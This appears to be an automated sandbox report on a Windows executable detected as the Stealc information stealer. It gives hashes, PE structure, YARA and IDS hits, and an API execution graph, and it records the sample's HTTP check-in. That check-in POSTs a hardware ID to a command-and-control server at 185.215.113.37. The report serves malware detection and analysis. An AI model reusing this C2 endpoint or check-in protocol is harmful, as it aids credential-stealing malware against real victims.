                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.9473200177433245
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'809'408 bytes
                          MD5:c85bd4b2ad207a44d2cf47f0b48d6d09
                          SHA1:3d20ea5592b7742bf5a05c166aa3e18c9d187681
                          SHA256:294ee8a1545ecad7c74a8994fd7cd56acbdf3694ee80a77ba33e12c0067717d7
                          SHA512:6933e4ebf98f4644c608658a5f635e7ad7a17d8d7fb4b189397872729bf5f5e200cf79674710637a40abdfc4beb3599dc6e53852815acfcf435a866acb56ff2e
                          SSDEEP:49152:w7LFTRV5omRHDLvgrjo1Q9862KWDRknjzBY0:w7xd4svgPI7oqkZY0
                          TLSH:FA8533F41EF0B95ACC1B9EFD8153964980B147BC5F68CF2C55B1A62D883EA87D83246C
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0xa84000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007FCA94EE07DAh

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x25b0000x22800b2d336d7bd9d535e12b689ac649ce19bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x25e0000x2910000x200bf9a427ef0d2ac8c2d12b6ca993a6f46unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          xisdcata0x4ef0000x1940000x193a0003cc6eca5bf5492f3690a7798a0ec282False0.9949372386961908data7.953663128653993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          bazuxvkp0x6830000x10000x4005237d2fe741be60f0d49a40042cde6c0False0.822265625data6.33729039656592IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x6840000x30000x22001a41df39d7ac59eec5b62f4b57279ee7False0.06767003676470588DOS executable (COM)0.7790813178297834IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-24T01:10:02.998180+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 24, 2024 01:10:01.766046047 CEST4973080192.168.2.4185.215.113.37
                          Oct 24, 2024 01:10:01.771348953 CEST8049730185.215.113.37192.168.2.4
                          Oct 24, 2024 01:10:01.771429062 CEST4973080192.168.2.4185.215.113.37
                          Oct 24, 2024 01:10:01.771707058 CEST4973080192.168.2.4185.215.113.37
                          Oct 24, 2024 01:10:01.777004004 CEST8049730185.215.113.37192.168.2.4
                          Oct 24, 2024 01:10:02.702789068 CEST8049730185.215.113.37192.168.2.4
                          Oct 24, 2024 01:10:02.702877998 CEST4973080192.168.2.4185.215.113.37
                          Oct 24, 2024 01:10:02.705238104 CEST4973080192.168.2.4185.215.113.37
                          Oct 24, 2024 01:10:02.710542917 CEST8049730185.215.113.37192.168.2.4
                          Oct 24, 2024 01:10:02.998061895 CEST8049730185.215.113.37192.168.2.4
                          Oct 24, 2024 01:10:02.998179913 CEST4973080192.168.2.4185.215.113.37
                          Oct 24, 2024 01:10:05.721029997 CEST4973080192.168.2.4185.215.113.37

                          HTTP Request Dependency Graph

                          • 185.215.113.37

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449730185.215.113.37807400C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Oct 24, 2024 01:10:01.771707058 CEST89OUTGET / HTTP/1.1
                          Host: 185.215.113.37
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Oct 24, 2024 01:10:02.702789068 CEST203INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 23:10:02 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Oct 24, 2024 01:10:02.705238104 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH
                          Host: 185.215.113.37
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 38 37 31 34 44 39 39 42 30 32 31 32 32 35 36 38 36 33 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a
                          Data Ascii: ------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="hwid"8E8714D99B021225686314------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="build"doma------JJECGCBGDBKJJKEBFBFH--
                          Oct 24, 2024 01:10:02.998061895 CEST210INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 23:10:02 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          System Behavior

                          General

                          Target ID:0
                          Start time:19:09:58
                          Start date:23/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x340000
                          File size:1'809'408 bytes
                          MD5 hash:C85BD4B2AD207A44D2CF47F0B48D6D09
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:9.7%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:24
                            execution_graph 13095 3569f0 13140 342260 13095->13140 13119 356a64 13120 35a9b0 4 API calls 13119->13120 13121 356a6b 13120->13121 13122 35a9b0 4 API calls 13121->13122 13123 356a72 13122->13123 13124 35a9b0 4 API calls 13123->13124 13125 356a79 13124->13125 13126 35a9b0 4 API calls 13125->13126 13127 356a80 13126->13127 13292 35a8a0 13127->13292 13129 356b0c 13296 356920 GetSystemTime 13129->13296 13131 356a89 13131->13129 13133 356ac2 OpenEventA 13131->13133 13135 356af5 CloseHandle Sleep 13133->13135 13136 356ad9 13133->13136 13137 356b0a 13135->13137 13139 356ae1 CreateEventA 13136->13139 13137->13131 13139->13129 13493 3445c0 13140->13493 13142 342274 13143 3445c0 2 API calls 13142->13143 13144 34228d 13143->13144 13145 3445c0 2 API calls 13144->13145 13146 3422a6 13145->13146 13147 3445c0 2 API calls 13146->13147 13148 3422bf 13147->13148 13149 3445c0 2 API calls 13148->13149 13150 3422d8 13149->13150 13151 3445c0 2 API calls 13150->13151 13152 3422f1 13151->13152 13153 3445c0 2 API calls 13152->13153 13154 34230a 13153->13154 13155 3445c0 2 API calls 13154->13155 13156 342323 13155->13156 13157 3445c0 2 API calls 13156->13157 13158 34233c 13157->13158 13159 3445c0 2 API calls 13158->13159 13160 342355 13159->13160 13161 3445c0 2 API calls 13160->13161 13162 34236e 13161->13162 13163 3445c0 2 API calls 13162->13163 13164 342387 13163->13164 13165 3445c0 2 API calls 13164->13165 13166 3423a0 13165->13166 13167 3445c0 2 API calls 13166->13167 13168 3423b9 13167->13168 13169 3445c0 2 API calls 13168->13169 13170 3423d2 13169->13170 13171 3445c0 2 API calls 13170->13171 13172 3423eb 13171->13172 13173 3445c0 2 API calls 13172->13173 13174 342404 13173->13174 13175 3445c0 2 API calls 13174->13175 13176 34241d 13175->13176 13177 3445c0 2 API calls 13176->13177 13178 342436 13177->13178 13179 3445c0 2 API calls 13178->13179 13180 34244f 13179->13180 13181 3445c0 2 API calls 13180->13181 13182 342468 13181->13182 13183 3445c0 2 API calls 13182->13183 13184 342481 13183->13184 13185 3445c0 2 API calls 13184->13185 13186 34249a 13185->13186 13187 3445c0 2 API calls 13186->13187 13188 3424b3 13187->13188 13189 3445c0 2 API calls 13188->13189 13190 3424cc 13189->13190 13191 3445c0 2 API calls 13190->13191 13192 3424e5 13191->13192 13193 3445c0 2 API calls 13192->13193 13194 3424fe 13193->13194 13195 3445c0 2 API calls 13194->13195 13196 342517 13195->13196 13197 3445c0 2 API calls 13196->13197 13198 342530 13197->13198 13199 3445c0 2 API calls 13198->13199 13200 342549 13199->13200 13201 3445c0 2 API calls 13200->13201 13202 342562 13201->13202 13203 3445c0 2 API calls 13202->13203 13204 34257b 13203->13204 13205 3445c0 2 API calls 13204->13205 13206 342594 13205->13206 13207 3445c0 2 API calls 13206->13207 13208 3425ad 13207->13208 13209 3445c0 2 API calls 13208->13209 13210 3425c6 13209->13210 13211 3445c0 2 API calls 13210->13211 13212 3425df 13211->13212 13213 3445c0 2 API calls 13212->13213 13214 3425f8 13213->13214 13215 3445c0 2 API calls 13214->13215 13216 342611 13215->13216 13217 3445c0 2 API calls 13216->13217 13218 34262a 13217->13218 13219 3445c0 2 API calls 13218->13219 13220 342643 13219->13220 13221 3445c0 2 API calls 13220->13221 13222 34265c 13221->13222 13223 3445c0 2 API calls 13222->13223 13224 342675 13223->13224 13225 3445c0 2 API calls 13224->13225 13226 34268e 13225->13226 13227 359860 13226->13227 13498 359750 GetPEB 13227->13498 13229 359868 13230 359a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13229->13230 13231 35987a 13229->13231 13232 359af4 GetProcAddress 13230->13232 13233 359b0d 13230->13233 13234 35988c 21 API calls 13231->13234 13232->13233 13235 359b46 13233->13235 13236 359b16 GetProcAddress GetProcAddress 13233->13236 13234->13230 13237 359b4f GetProcAddress 13235->13237 13238 359b68 13235->13238 13236->13235 13237->13238 13239 359b71 GetProcAddress 13238->13239 13240 359b89 13238->13240 13239->13240 13241 356a00 13240->13241 13242 359b92 GetProcAddress GetProcAddress 13240->13242 13243 35a740 13241->13243 13242->13241 13244 35a750 13243->13244 13245 356a0d 13244->13245 13246 35a77e lstrcpy 13244->13246 13247 3411d0 13245->13247 13246->13245 13248 3411e8 13247->13248 13249 341217 13248->13249 13250 34120f ExitProcess 13248->13250 13251 341160 GetSystemInfo 13249->13251 13252 341184 13251->13252 13253 34117c ExitProcess 13251->13253 13254 341110 GetCurrentProcess VirtualAllocExNuma 13252->13254 13255 341141 ExitProcess 13254->13255 13256 341149 13254->13256 13499 3410a0 VirtualAlloc 13256->13499 13259 341220 13503 3589b0 13259->13503 13262 341249 __aulldiv 13263 34129a 13262->13263 13264 341292 ExitProcess 13262->13264 13265 356770 GetUserDefaultLangID 13263->13265 13266 3567d3 13265->13266 13267 356792 13265->13267 13273 341190 13266->13273 13267->13266 13268 3567b7 ExitProcess 13267->13268 13269 3567c1 ExitProcess 13267->13269 13270 3567a3 ExitProcess 13267->13270 13271 3567ad ExitProcess 13267->13271 13272 3567cb ExitProcess 13267->13272 13274 3578e0 3 API calls 13273->13274 13275 34119e 13274->13275 13276 3411cc 13275->13276 13277 357850 3 API calls 13275->13277 13280 357850 GetProcessHeap RtlAllocateHeap GetUserNameA 13276->13280 13278 3411b7 13277->13278 13278->13276 13279 3411c4 ExitProcess 13278->13279 13281 356a30 13280->13281 13282 3578e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13281->13282 13283 356a43 13282->13283 13284 35a9b0 13283->13284 13505 35a710 13284->13505 13286 35a9c1 lstrlen 13288 35a9e0 13286->13288 13287 35aa18 13506 35a7a0 13287->13506 13288->13287 13290 35a9fa lstrcpy lstrcat 13288->13290 13290->13287 13291 35aa24 13291->13119 13293 35a8bb 13292->13293 13294 35a90b 13293->13294 13295 35a8f9 lstrcpy 13293->13295 13294->13131 13295->13294 13510 356820 13296->13510 13298 35698e 13299 356998 sscanf 13298->13299 13539 35a800 13299->13539 13301 3569aa SystemTimeToFileTime SystemTimeToFileTime 13302 3569e0 13301->13302 13303 3569ce 13301->13303 13305 355b10 13302->13305 13303->13302 13304 3569d8 ExitProcess 13303->13304 13306 355b1d 13305->13306 13307 35a740 lstrcpy 13306->13307 13308 355b2e 13307->13308 13541 35a820 lstrlen 13308->13541 13311 35a820 2 API calls 13312 355b64 13311->13312 13313 35a820 2 API calls 13312->13313 13314 355b74 13313->13314 13545 356430 13314->13545 13317 35a820 2 API calls 13318 355b93 13317->13318 13319 35a820 2 API calls 13318->13319 13320 355ba0 13319->13320 13321 35a820 2 API calls 13320->13321 13322 355bad 13321->13322 13323 35a820 2 API calls 13322->13323 13324 355bf9 13323->13324 13554 3426a0 13324->13554 13332 355cc3 13333 356430 lstrcpy 13332->13333 13334 355cd5 13333->13334 13335 35a7a0 lstrcpy 13334->13335 13336 355cf2 13335->13336 13337 35a9b0 4 API calls 13336->13337 13338 355d0a 13337->13338 13339 35a8a0 lstrcpy 13338->13339 13340 355d16 13339->13340 13341 35a9b0 4 API calls 13340->13341 13342 355d3a 13341->13342 13343 35a8a0 lstrcpy 13342->13343 13344 355d46 13343->13344 13345 35a9b0 4 API calls 13344->13345 13346 355d6a 13345->13346 13347 35a8a0 lstrcpy 13346->13347 13348 355d76 13347->13348 13349 35a740 lstrcpy 13348->13349 13350 355d9e 13349->13350 14280 357500 GetWindowsDirectoryA 13350->14280 13353 35a7a0 lstrcpy 13354 355db8 13353->13354 14290 344880 13354->14290 13356 355dbe 14435 3517a0 13356->14435 13358 355dc6 13359 35a740 lstrcpy 13358->13359 13360 355de9 13359->13360 13361 341590 lstrcpy 13360->13361 13362 355dfd 13361->13362 14451 345960 13362->14451 13364 355e03 14595 351050 13364->14595 13366 355e0e 13367 35a740 lstrcpy 13366->13367 13368 355e32 13367->13368 13369 341590 lstrcpy 13368->13369 13370 355e46 13369->13370 13371 345960 34 API calls 13370->13371 13372 355e4c 13371->13372 14599 350d90 13372->14599 13374 355e57 13375 35a740 lstrcpy 13374->13375 13376 355e79 13375->13376 13377 341590 lstrcpy 13376->13377 13378 355e8d 13377->13378 13379 345960 34 API calls 13378->13379 13380 355e93 13379->13380 14606 350f40 13380->14606 13382 355e9e 13383 341590 lstrcpy 13382->13383 13384 355eb5 13383->13384 14611 351a10 13384->14611 13386 355eba 13387 35a740 lstrcpy 13386->13387 13388 355ed6 13387->13388 14955 344fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13388->14955 13390 355edb 13391 341590 lstrcpy 13390->13391 13392 355f5b 13391->13392 14962 350740 13392->14962 13394 355f60 13395 35a740 lstrcpy 13394->13395 13396 355f86 13395->13396 13397 341590 lstrcpy 13396->13397 13398 355f9a 13397->13398 13399 345960 34 API calls 13398->13399 13400 355fa0 13399->13400 13494 3445d1 RtlAllocateHeap 13493->13494 13497 344621 VirtualProtect 13494->13497 13497->13142 13498->13229 13500 3410c2 ctype 13499->13500 13501 3410fd 13500->13501 13502 3410e2 VirtualFree 13500->13502 13501->13259 13502->13501 13504 341233 GlobalMemoryStatusEx 13503->13504 13504->13262 13505->13286 13507 35a7c2 13506->13507 13508 35a7ec 13507->13508 13509 35a7da lstrcpy 13507->13509 13508->13291 13509->13508 13511 35a740 lstrcpy 13510->13511 13512 356833 13511->13512 13513 35a9b0 4 API calls 13512->13513 13514 356845 13513->13514 13515 35a8a0 lstrcpy 13514->13515 13516 35684e 13515->13516 13517 35a9b0 4 API calls 13516->13517 13518 356867 13517->13518 13519 35a8a0 lstrcpy 13518->13519 13520 356870 13519->13520 13521 35a9b0 4 API calls 13520->13521 13522 35688a 13521->13522 13523 35a8a0 lstrcpy 13522->13523 13524 356893 13523->13524 13525 35a9b0 4 API calls 13524->13525 13526 3568ac 13525->13526 13527 35a8a0 lstrcpy 13526->13527 13528 3568b5 13527->13528 13529 35a9b0 4 API calls 13528->13529 13530 3568cf 13529->13530 13531 35a8a0 lstrcpy 13530->13531 13532 3568d8 13531->13532 13533 35a9b0 4 API calls 13532->13533 13534 3568f3 13533->13534 13535 35a8a0 lstrcpy 13534->13535 13536 3568fc 13535->13536 13537 35a7a0 lstrcpy 13536->13537 13538 356910 13537->13538 13538->13298 13540 35a812 13539->13540 13540->13301 13542 35a83f 13541->13542 13543 355b54 13542->13543 13544 35a87b lstrcpy 13542->13544 13543->13311 13544->13543 13546 35a8a0 lstrcpy 13545->13546 13547 356443 13546->13547 13548 35a8a0 lstrcpy 13547->13548 13549 356455 13548->13549 13550 35a8a0 lstrcpy 13549->13550 13551 356467 13550->13551 13552 35a8a0 lstrcpy 13551->13552 13553 355b86 13552->13553 13553->13317 13555 3445c0 2 API calls 13554->13555 13556 3426b4 13555->13556 13557 3445c0 2 API calls 13556->13557 13558 3426d7 13557->13558 13559 3445c0 2 API calls 13558->13559 13560 3426f0 13559->13560 13561 3445c0 2 API calls 13560->13561 13562 342709 13561->13562 13563 3445c0 2 API calls 13562->13563 13564 342736 13563->13564 13565 3445c0 2 API calls 13564->13565 13566 34274f 13565->13566 13567 3445c0 2 API calls 13566->13567 13568 342768 13567->13568 13569 3445c0 2 API calls 13568->13569 13570 342795 13569->13570 13571 3445c0 2 API calls 13570->13571 13572 3427ae 13571->13572 13573 3445c0 2 API calls 13572->13573 13574 3427c7 13573->13574 13575 3445c0 2 API calls 13574->13575 13576 3427e0 13575->13576 13577 3445c0 2 API calls 13576->13577 13578 3427f9 13577->13578 13579 3445c0 2 API calls 13578->13579 13580 342812 13579->13580 13581 3445c0 2 API calls 13580->13581 13582 34282b 13581->13582 13583 3445c0 2 API calls 13582->13583 13584 342844 13583->13584 13585 3445c0 2 API calls 13584->13585 13586 34285d 13585->13586 13587 3445c0 2 API calls 13586->13587 13588 342876 13587->13588 13589 3445c0 2 API calls 13588->13589 13590 34288f 13589->13590 13591 3445c0 2 API calls 13590->13591 13592 3428a8 13591->13592 13593 3445c0 2 API calls 13592->13593 13594 3428c1 13593->13594 13595 3445c0 2 API calls 13594->13595 13596 3428da 13595->13596 13597 3445c0 2 API calls 13596->13597 13598 3428f3 13597->13598 13599 3445c0 2 API calls 13598->13599 13600 34290c 13599->13600 13601 3445c0 2 API calls 13600->13601 13602 342925 13601->13602 13603 3445c0 2 API calls 13602->13603 13604 34293e 13603->13604 13605 3445c0 2 API calls 13604->13605 13606 342957 13605->13606 13607 3445c0 2 API calls 13606->13607 13608 342970 13607->13608 13609 3445c0 2 API calls 13608->13609 13610 342989 13609->13610 13611 3445c0 2 API calls 13610->13611 13612 3429a2 13611->13612 13613 3445c0 2 API calls 13612->13613 13614 3429bb 13613->13614 13615 3445c0 2 API calls 13614->13615 13616 3429d4 13615->13616 13617 3445c0 2 API calls 13616->13617 13618 3429ed 13617->13618 13619 3445c0 2 API calls 13618->13619 13620 342a06 13619->13620 13621 3445c0 2 API calls 13620->13621 13622 342a1f 13621->13622 13623 3445c0 2 API calls 13622->13623 13624 342a38 13623->13624 13625 3445c0 2 API calls 13624->13625 13626 342a51 13625->13626 13627 3445c0 2 API calls 13626->13627 13628 342a6a 13627->13628 13629 3445c0 2 API calls 13628->13629 13630 342a83 13629->13630 13631 3445c0 2 API calls 13630->13631 13632 342a9c 13631->13632 13633 3445c0 2 API calls 13632->13633 13634 342ab5 13633->13634 13635 3445c0 2 API calls 13634->13635 13636 342ace 13635->13636 13637 3445c0 2 API calls 13636->13637 13638 342ae7 13637->13638 13639 3445c0 2 API calls 13638->13639 13640 342b00 13639->13640 13641 3445c0 2 API calls 13640->13641 13642 342b19 13641->13642 13643 3445c0 2 API calls 13642->13643 13644 342b32 13643->13644 13645 3445c0 2 API calls 13644->13645 13646 342b4b 13645->13646 13647 3445c0 2 API calls 13646->13647 13648 342b64 13647->13648 13649 3445c0 2 API calls 13648->13649 13650 342b7d 13649->13650 13651 3445c0 2 API calls 13650->13651 13652 342b96 13651->13652 13653 3445c0 2 API calls 13652->13653 13654 342baf 13653->13654 13655 3445c0 2 API calls 13654->13655 13656 342bc8 13655->13656 13657 3445c0 2 API calls 13656->13657 13658 342be1 13657->13658 13659 3445c0 2 API calls 13658->13659 13660 342bfa 13659->13660 13661 3445c0 2 API calls 13660->13661 13662 342c13 13661->13662 13663 3445c0 2 API calls 13662->13663 13664 342c2c 13663->13664 13665 3445c0 2 API calls 13664->13665 13666 342c45 13665->13666 13667 3445c0 2 API calls 13666->13667 13668 342c5e 13667->13668 13669 3445c0 2 API calls 13668->13669 13670 342c77 13669->13670 13671 3445c0 2 API calls 13670->13671 13672 342c90 13671->13672 13673 3445c0 2 API calls 13672->13673 13674 342ca9 13673->13674 13675 3445c0 2 API calls 13674->13675 13676 342cc2 13675->13676 13677 3445c0 2 API calls 13676->13677 13678 342cdb 13677->13678 13679 3445c0 2 API calls 13678->13679 13680 342cf4 13679->13680 13681 3445c0 2 API calls 13680->13681 13682 342d0d 13681->13682 13683 3445c0 2 API calls 13682->13683 13684 342d26 13683->13684 13685 3445c0 2 API calls 13684->13685 13686 342d3f 13685->13686 13687 3445c0 2 API calls 13686->13687 13688 342d58 13687->13688 13689 3445c0 2 API calls 13688->13689 13690 342d71 13689->13690 13691 3445c0 2 API calls 13690->13691 13692 342d8a 13691->13692 13693 3445c0 2 API calls 13692->13693 13694 342da3 13693->13694 13695 3445c0 2 API calls 13694->13695 13696 342dbc 13695->13696 13697 3445c0 2 API calls 13696->13697 13698 342dd5 13697->13698 13699 3445c0 2 API calls 13698->13699 13700 342dee 13699->13700 13701 3445c0 2 API calls 13700->13701 13702 342e07 13701->13702 13703 3445c0 2 API calls 13702->13703 13704 342e20 13703->13704 13705 3445c0 2 API calls 13704->13705 13706 342e39 13705->13706 13707 3445c0 2 API calls 13706->13707 13708 342e52 13707->13708 13709 3445c0 2 API calls 13708->13709 13710 342e6b 13709->13710 13711 3445c0 2 API calls 13710->13711 13712 342e84 13711->13712 13713 3445c0 2 API calls 13712->13713 13714 342e9d 13713->13714 13715 3445c0 2 API calls 13714->13715 13716 342eb6 13715->13716 13717 3445c0 2 API calls 13716->13717 13718 342ecf 13717->13718 13719 3445c0 2 API calls 13718->13719 13720 342ee8 13719->13720 13721 3445c0 2 API calls 13720->13721 13722 342f01 13721->13722 13723 3445c0 2 API calls 13722->13723 13724 342f1a 13723->13724 13725 3445c0 2 API calls 13724->13725 13726 342f33 13725->13726 13727 3445c0 2 API calls 13726->13727 13728 342f4c 13727->13728 13729 3445c0 2 API calls 13728->13729 13730 342f65 13729->13730 13731 3445c0 2 API calls 13730->13731 13732 342f7e 13731->13732 13733 3445c0 2 API calls 13732->13733 13734 342f97 13733->13734 13735 3445c0 2 API calls 13734->13735 13736 342fb0 13735->13736 13737 3445c0 2 API calls 13736->13737 13738 342fc9 13737->13738 13739 3445c0 2 API calls 13738->13739 13740 342fe2 13739->13740 13741 3445c0 2 API calls 13740->13741 13742 342ffb 13741->13742 13743 3445c0 2 API calls 13742->13743 13744 343014 13743->13744 13745 3445c0 2 API calls 13744->13745 13746 34302d 13745->13746 13747 3445c0 